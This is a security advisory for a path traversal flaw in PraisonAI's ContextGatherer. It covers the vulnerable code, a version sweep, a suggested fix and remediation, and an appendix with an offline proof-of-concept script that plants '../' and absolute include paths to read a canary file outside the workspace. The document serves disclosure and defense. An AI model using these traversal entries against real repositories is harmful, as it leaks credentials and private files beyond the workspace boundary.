GHSA-q7m5-3jmv-vm48: Path Traversal
ContextGatherer include resolution permits absolute and traversal reads outside the workspace
Summary
PraisonAI's praisonai.ui.context.ContextGatherer treats the configured directory as the project workspace, but project-controlled .praisoncontext and .praisoninclude files can name absolute paths or .. traversal paths. When context gathering runs, PraisonAI opens those outside paths and appends their contents to the generated context bundle. An attacker who can supply or modify a workspace repository can therefore cause process-readable files outside the intended project root to be sent to the caller or model as project context.
Technical Details
ContextGatherer.getincludepaths() reads include entries directly from .praisoncontext and .praisoninclude under the configured workspace. It stores each non-comment line as a raw include path:
python includefile = os.path.join(self.directory, '.praisoncontext') if os.path.exists(includefile): with open(includefile, 'r') as f: includepaths.extend( line.strip() for line in f if line.strip() and not line.startswith('#') )
When .praisoncontext is present, gathercontext() passes every include entry through os.path.join(self.directory, includepath) and then processes the result:
python for includepath in self.includepaths: fullpath = os.path.join(self.directory, includepath) processpath(fullpath)
The .praisoninclude path has the same unsafe join after first processing the workspace:
python processpath(self.directory) for includepath in self.includepaths: fullpath = os.path.join(self.directory, includepath) processpath(fullpath)
There is no canonicalization or containment check before processpath() opens files or recursively walks directories. In Python, os.path.join(workspace, absolutepath) returns the absolute path and discards workspace; os.path.join(workspace, "../outside.py") remains outside the workspace once normalized by filesystem operations. addfilecontent() then opens the supplied path and appends file contents to the context before display bookkeeping:
python with open(filepath, 'r', encoding='utf-8') as f: content = f.read() context.append( f"File: {filepath}\n\n{content}\n\n{'=' 50}\n" ) self.includedfiles.append( Path(filepath).relativeto(self.directory) )
For parent traversal paths, Path(filepath).relativeto(self.directory) raises after the outside file content has already been appended, so the caller receives the outside content even if an error is logged. For absolute paths, the outside content is appended as well. This violates the workspace invariant for a context-gathering feature: repository-local include metadata should select files within the project, not arbitrary process-readable host files.
PoV
The minimal vulnerable shape is a workspace containing only a normal source file and one include file:
text workspace/ .praisoncontext # contains: ../outsidesecret.py inside.py outsidesecret.py # outside the workspace
Running ContextGatherer(directory="workspace").run() returns context containing outsidesecret.py even though that file is outside the configured workspace. The same result occurs when .praisoncontext contains an absolute path to the outside file, and when .praisoninclude contains either the parent traversal path or the absolute path.
PoC
Save the self-contained script from the Appendix below as contextincludeworkspacepov.py, then run it against a local checkout:
bash export PRAISONAI=/path/to/PraisonAI PYTHONPATH="$PRAISONAI/src/praisonai" python contextincludeworkspacepov.py
Expected vulnerable output:
json { "expectations": { "controlinsidefileiscollected": true, "controlwithoutincludedoesnotreadoutside": true, "praisoncontextabsolutepathdisclosesoutside": true, "praisoncontextparenttraversaldisclosesoutside": true, "praisonincludeabsolutepathdisclosesoutside": true, "praisonincludeparenttraversaldisclosesoutside": true }, "sourcecommit": "1620b49f36945d8cc8ee5635b906c960df5097a0", "sourcefile": "$PRAISONAI/src/praisonai/praisonai/ui/context.py", "vulnerable": true }
The version sweep sampled old and current releases. All sampled versions are vulnerable:
text {"ref":"v2.3.10","praisonaiversion":"2.3.10","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v2.3.11","praisonaiversion":"2.3.11","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v3.8.1","praisonaiversion":"3.8.1","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v3.9.26","praisonaiversion":"3.9.26","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.4.12","praisonaiversion":"4.4.12","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.5.16","praisonaiversion":"4.5.16","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.5.128","praisonaiversion":"4.5.128","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.6.58","praisonaiversion":"4.6.58","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.6.62","praisonaiversion":"4.6.62","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.6.63","praisonaiversion":"4.6.63","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"HEAD","praisonaiversion":"4.6.63","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true}
No external service, live target, real credential, model provider, or network access is needed for reproduction.
Impact
If a user or service runs PraisonAI context gathering on an attacker-influenced workspace, the attacker can cause local files outside the project root to be included in the generated context. Practical impacts include disclosure of source files from adjacent projects, local configuration, prompt transcripts, logs, API keys, and other process-readable text files with extensions that ContextGatherer considers relevant. If the context bundle is sent to an external model or exposed to a lower-trust caller, the file contents leave the intended workspace boundary.
This report claims confidentiality impact only. It does not claim arbitrary write, command execution, or availability impact.
Suggested severity: Medium under the direct local/workspace threat model because user interaction is required to run context gathering on an attacker-influenced workspace. Deployments that automatically gather context for untrusted repositories and forward it to a third-party model may score higher.
Suggested CVSS 3.1 vector:
text CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Relevant CWEs:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Suggested Fix
Make include-file path resolution fail closed around a single workspace-containment helper:
1. Resolve the configured workspace root once with Path(self.directory).resolve(). 2. For each include entry, reject absolute paths outside the workspace. 3. Join relative include entries to the workspace, resolve the result, and require resolved.relativeto(workspaceroot) to succeed before opening or walking anything. 4. Apply the helper to both .praisoncontext and .praisoninclude processing. 5. Reject escaped directories as well as escaped files; processpath() can recursively walk directories. 6. Avoid appending file content before display/bookkeeping operations that can fail. 7. Add regression tests for ../outside.py, absolute outside paths, and outside directories in both .praisoncontext and .praisoninclude.
Minimal containment shape:
python def resolveworkspaceinclude(workspace: str, includepath: str) -> Path: root = Path(workspace).resolve() candidate = Path(includepath) if not candidate.isabsolute(): candidate = root / candidate resolved = candidate.resolve() try: resolved.relativeto(root) except ValueError as exc: raise PermissionError(f"Context include path is outside workspace: {includepath}") from exc return resolved
Affected Package/Versions
- Package: PraisonAI / praisonai - Component: praisonai.ui.context.ContextGatherer - Current main tested: 1620b49f36945d8cc8ee5635b906c960df5097a0 - Current package version in the tested source tree: 4.6.63 - Latest tested release tag: v4.6.63 - Oldest sampled vulnerable release tag: v2.3.10
Suggested affected range, based on the sampled source sweep:
text praisonai >= 2.3.10, <= 4.6.63
The exact first affected released package version should be confirmed from release history; the sampled range shows the bug is longstanding and still present on current main.
Advisory History
No checked public advisory or local prior report matched praisonai.ui.context.ContextGatherer reading outside-workspace files because project-controlled .praisoncontext or .praisoninclude entries contain absolute paths or .. traversal paths.
Closest public comparators are related but distinct:
- GHSA-gcq3-mfvh-3x25: PraisonAI Code agent tools fail open without a workspace boundary. That advisory covers praisonai Code CODETOOLS wrappers and unset workspace defaults for read/edit helpers. This report has an explicitly configured workspace directory and an attacker-controlled include file inside that workspace; it does not use Code tools or an unset global workspace. - GHSA-j7qx-p75m-wp7g: PraisonAI dynamic-context artifact tools read arbitrary host files outside artifact storage. That advisory covers Dynamic Context artifact tools that accept raw artifactpath values. This report covers praisonai.ui.context.ContextGatherer include-file processing. - GHSA-22cj-m4wf-fv2c: PraisonAI Dynamic Context history and terminal tools read files outside configured storage via path traversal. That advisory covers Dynamic Context history/terminal stores where runid and agentid are path components. This report covers .praisoncontext/.praisoninclude entries in the classic UI context gatherer. - GHSA-grrg-5cg9-58pf / CVE-2026-40117: readskillfile() arbitrary file read. This report does not use skill tools or approval-gated skill file APIs. - GHSA-7j2f-xc8p-fjmq / CVE-2026-40152 and GHSA-693f-pf34-72c5: FileTools/listing path traversal surfaces. This report is not in praisonaiagents.tools.filetools or legacy FileTools; it discloses file content through context-gathering output. - GHSA-fwh2-95jw-g4j6: PraisonAI MultiAgentMonitor path traversal, published on 2026-06-19, affects versions before 1.5.115. This report affects current main and 4.6.63 and is triggered by .praisoncontext/.praisoninclude include paths rather than MultiAgentMonitor path parameters. - GHSA-qwwv-hc99-6f5p, GHSA-5fr5-2c3f-3fcr, GHSA-gx4r-3wg8-9w5x, and GHSA-x44p-gg67-52fc: current public PraisonAI advisories for MultiAgentLedger duplicate IDs, AGUI CORS/authorization, UI approval-mode command execution, and approval cache keying. None covers ContextGatherer, .praisoncontext, .praisoninclude, or praisonai.ui.context.
Public search found no hits for PraisonAI ContextGatherer .praisoncontext workspace boundary arbitrary file read, praisoninclude ContextGatherer, or praisonai.ui.context in public GitHub advisory text.
References
- PraisonAI repository: https://github.com/MervinPraison/PraisonAI - PraisonAI security advisories: https://github.com/MervinPraison/PraisonAI/security/advisories - GitHub Advisory Database search for PraisonAI: https://github.com/advisories?query=PraisonAI - GHSA-gcq3-mfvh-3x25: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gcq3-mfvh-3x25 - GHSA-j7qx-p75m-wp7g: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-j7qx-p75m-wp7g - GHSA-22cj-m4wf-fv2c: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-22cj-m4wf-fv2c - GHSA-grrg-5cg9-58pf: https://github.com/advisories/GHSA-grrg-5cg9-58pf - GHSA-7j2f-xc8p-fjmq: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq - GHSA-fwh2-95jw-g4j6: https://github.com/advisories/GHSA-fwh2-95jw-g4j6 - CWE-22: https://cwe.mitre.org/data/definitions/22.html - CWE-200: https://cwe.mitre.org/data/definitions/200.html
Appendix: Self-Contained Context Include Workspace PoC
python #!/usr/bin/env python3 """Offline PoV for PraisonAI ContextGatherer include-file workspace escape."""
from future import annotations
import contextlib import io import inspect import json import logging import subprocess import tempfile from pathlib import Path
from praisonai.ui.context import ContextGatherer
CANARY = "PRAISONCONTEXTCANARY=outside-workspace" logging.getLogger("praisonai.ui.context").disabled = True
def importedsourcefile() -> Path: return Path(inspect.getfile(ContextGatherer)).resolve()
def githead(sourcefile: Path) -> str: try: reporoot = next(parent for parent in sourcefile.parents if (parent / ".git").exists()) return subprocess.checkoutput( ["git", "-C", str(reporoot), "rev-parse", "HEAD"], text=True, stderr=subprocess.DEVNULL, ).strip() except Exception: return "unknown"
def gathercontext(workspace: Path) -> tuple[str, str]: stdout = io.StringIO() stderr = io.StringIO() with contextlib.redirectstdout(stdout), contextlib.redirectstderr(stderr): context, tokens, tree = ContextGatherer( directory=str(workspace), maxfilesize=100000, maxtokens=100000, ).run() return context, stdout.getvalue() + stderr.getvalue()
def resetincludefiles(workspace: Path) -> None: for name in (".praisoncontext", ".praisoninclude"): path = workspace / name if path.exists(): path.unlink()
def redact(value, temproot: Path, sourcefile: Path): if isinstance(value, str): sourceroot = next((parent for parent in sourcefile.parents if (parent / ".git").exists()), sourcefile.parents[4]) return value.replace(str(temproot), "$TMPDIR").replace(str(sourceroot), "$PRAISONAI") if isinstance(value, list): return [redact(item, temproot, sourcefile) for item in value] if isinstance(value, dict): return {key: redact(item, temproot, sourcefile) for key, item in value.items()} return value
def main() -> None: sourcefile = importedsourcefile() with tempfile.TemporaryDirectory(prefix="praison-context-include-pov-") as tmp: temproot = Path(tmp) workspace = temproot / "workspace" workspace.mkdir() inside = workspace / "inside.py" outside = temproot / "outsidesecret.py" inside.writetext("INSIDEONLY = True\n", encoding="utf-8") outside.writetext(f"{CANARY}\n", encoding="utf-8")
contexts = {} logs = {}
resetincludefiles(workspace) contexts["controlnoinclude"], logs["controlnoinclude"] = gathercontext(workspace)
resetincludefiles(workspace) (workspace / ".praisoncontext").writetext("../outsidesecret.py\n", encoding="utf-8") contexts["praisoncontextparenttraversal"], logs["praisoncontextparenttraversal"] = gathercontext(workspace)
resetincludefiles(workspace) (workspace / ".praisoncontext").writetext(str(outside) + "\n", encoding="utf-8") contexts["praisoncontextabsolutepath"], logs["praisoncontextabsolutepath"] = gathercontext(workspace)
resetincludefiles(workspace) (workspace / ".praisoninclude").writetext("../outsidesecret.py\n", encoding="utf-8") contexts["praisonincludeparenttraversal"], logs["praisonincludeparenttraversal"] = gathercontext(workspace)
resetincludefiles(workspace) (workspace / ".praisoninclude").writetext(str(outside) + "\n", encoding="utf-8") contexts["praisonincludeabsolutepath"], logs["praisonincludeabsolutepath"] = gathercontext(workspace)
expectations = { "controlwithoutincludedoesnotreadoutside": CANARY not in contexts["controlnoinclude"], "controlinsidefileiscollected": "INSIDEONLY = True" in contexts["controlnoinclude"], "praisoncontextparenttraversaldisclosesoutside": CANARY in contexts["praisoncontextparenttraversal"], "praisoncontextabsolutepathdisclosesoutside": CANARY in contexts["praisoncontextabsolutepath"], "praisonincludeparenttraversaldisclosesoutside": CANARY in contexts["praisonincludeparenttraversal"], "praisonincludeabsolutepathdisclosesoutside": CANARY in contexts["praisonincludeabsolutepath"], }
output = { "sourcecommit": githead(sourcefile), "sourcefile": str(sourcefile), "workspaceroot": str(workspace), "outsidefile": str(outside), "vulnerable": all(expectations.values()), "expectations": expectations, "contextcontains": { name: { "containsinside": "INSIDEONLY = True" in context, "containsoutsidecanary": CANARY in context, } for name, context in contexts.items() }, "capturedlogs": logs, }
print(json.dumps(redact(output, temproot, sourcefile), indent=2, sortkeys=True))
if name == "main": main()
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/praisonaito a version that resolves this vulnerability.Fixed in 4.6.78 - Compensating control
In praisonai.ui.context.ContextGatherer, resolve the configured workspace root once with Path(self.directory).resolve(), then apply a fail-closed containment helper to both .praisoncontext and .praisoninclude entries: resolve each candidate path and require resolved.relative_to(workspace_root) to succeed before opening or recursively walking it, rejecting absolute paths, parent-traversal paths, and escaped directories. Ensure file content is not appended until validation and display/bookkeeping operations have succeeded, and add regression tests covering ../outside.py, absolute outside paths, and outside directories for both include files.
Event History
Frequently Asked Questions
Who is exposed to this issue?
Deployments that run ContextGatherer on a workspace repository that an attacker can supply or modify are exposed. The impact is limited to files outside the workspace that are readable by the process running PraisonAI.
What must an attacker control to exploit it?
The attacker needs to supply or modify a workspace repository and add include entries to .praisoncontext or .praisoninclude. Those entries can use absolute paths or .. traversal paths to reference files outside the configured directory.
How can I check whether a workspace is affected?
Inspect .praisoncontext and .praisoninclude in the configured workspace for non-comment include entries containing absolute paths or .. path components. If context gathering has processed such entries, the referenced process-readable file contents may have been appended to the generated context bundle.